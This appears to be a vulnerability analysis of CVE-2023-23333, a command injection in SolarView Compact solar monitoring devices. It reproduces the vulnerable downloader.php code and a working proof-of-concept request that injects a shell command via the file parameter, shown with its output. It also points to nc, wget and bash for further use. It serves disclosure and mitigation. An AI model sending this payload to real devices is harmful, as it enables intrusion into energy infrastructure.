Very High
CVE-2023-23333
CVE-2023-23333
Description
There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.
Add Assessment
Technical Analysis
With the heat records breaking almost every day around the globe, Solar Energy solutions are becoming rapidly main stream in households around the world. If you look in the street where you live, you will probably find a few neighbors with solar panels installed on their roof and nice little apps that can track you solar energy capacity.
Cool stuff, but as always, when connected to the Internet, you can introduce an entry point for a attacker to hack into your solar energy devices / inverters. Cyble security analysts recently published a nice report that explains the Security Gaps in Green Energy Sector: Unveiling the Hidden Dangers of Public-Facing PV Measuring and Diagnostics Solutions.
One of these energy solution providers is a Japanese company called Contec, that provides Solar Energy solutions to the market. One of their solutions, SolarView Compact has a vulnerability that allows remote code execution on a vulnerable SolarView Compact device by bypassing internal restrictions through the vulnerable endpoint downloader.php using the file parameter. Firmware versions up to v6.33 are vulnerable.
Again a very basic case of using direct system calls in your application code without sanitizing the input parameters properly.
If you analyze downloader.php, you easily can identify the vulnerable code that triggers the remote code execution with a malicious request.
You can retrieve this information by downloading the SolarView Compact firmware v600. You need to register yourself before you can download the firmware svcUpdateV600.fpk.
Run the following commands to access the firmware and extract downloader.php.
# mv svcUpdateV600.fpk svcUpdateV600.gz # tar -ztvf./svcUpdateV600.gz html/downloader.php -rwxr--r-- 0 nobody nogroup 1986 Dec 7 2018 html/downloader.php # tar -zxvf./svcUpdateV600.gz html/downloader.php x html/downloader.php
// downloader.php <? if( isset($_REQUEST['file']) ){ $file = $_REQUEST['file']; } // function get_extend( $filename ){ $pos = strrpos( $filename, "." ); return substr( $filename, $pos ); } // // $ext = get_extend( $file ); // switch( $ext ){ case ".csv": break; case ".jpg": case ".jpeg": case ".JPG": case ".JPEG": case ".Jpeg": case ".Jpg": case ".gif": case ".GIF": case ".Gif": $path = "/home/www/html/images/"; break; case ".zip": // $file is not proper sanitized !!!! $ARCH_FILE = sprintf("/home/contec/data/%s", $file); if( file_exists($ARCH_FILE) ){ unlink($ARCH_FILE); } $cmd = sprintf("/usr/local/bin/data_zip.sh %s > /dev/null", basename($ARCH_FILE)); // Using a direct system call can trigger the RCE !!!! system($cmd); $file = $ARCH_FILE; break; } ....
A short demonstration below shows how easy it is to trigger the RCE.
Malicious burp request using curl http://TARGET-IP/downloader.php?file=%3Bid%3B.zip
GET /downloader.php?file=%3Bid%3B.zip HTTP/1.1 Host: <TARGET-IP> User-Agent: curl/7.88.1 Accept: */* Connection: close
Burp response
HTTP/1.1 200 OK X-Powered-By: PHP/5.2.17 Content-type: text/html Connection: close Date: Wed, 23 Aug 2023 08:09:07 GMT Server: lighttpd/1.4.28 Content-Length: 1072 5000 rows exported. -> /tmp/history.csv zip warning: name not matched: images/slide_monthly_guide.png zip warning: name not matched: images/slide_daily_guide.png zip I/O error: Not a directory zip error: Could not create output file (/home/contec/data/.zip) uid=1001(contec) gid=0(root) <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/css; charset=Shift_JIS"> <LINK HREF="/css/style1.css" REL="stylesheet" TYPE="text/css"> <LINK REL="SHORTCUT ICON" HREF="/favicon.ico"> <TITLE>Error 404</TITLE> </HEAD> <BODY> ....
I will leave it to the readers imagination what else you can run then a simple id command, but the underlying Linux armle operating system has a nice rich command set such as nc, wget, bash, python, openssl and base64 that can be leveraged for your RCE.
And as you can see, we already get a little bonus because default the security context of the user contec, which is running the service, is part of the root group that gives us elevated privileges.
A Metasploit module is in development.
You can find the module here in my local repository or as PR 18313 at the Metasploit Github development.
Mitigation
Please update your SolarView Compact application to the latest available firmware which is v8.00 or higher.
References
SolarView Compact
Security Gaps in Green Energy Sector
CVE-2023-23333
SolarView Unauthenticated RCE – h00die-gr3y Metasploit local repository
Metasploit PR 18313
Credits
To all good fellows who raised this concern ;–)
CVSS V3 Severity and Metrics
General Information
Vendors
- contec
Products
- solarview compact firmware
Metasploit Modules
References
Exploit
A PoC added here by the AKB Worker must have at least 2 GitHub stars.
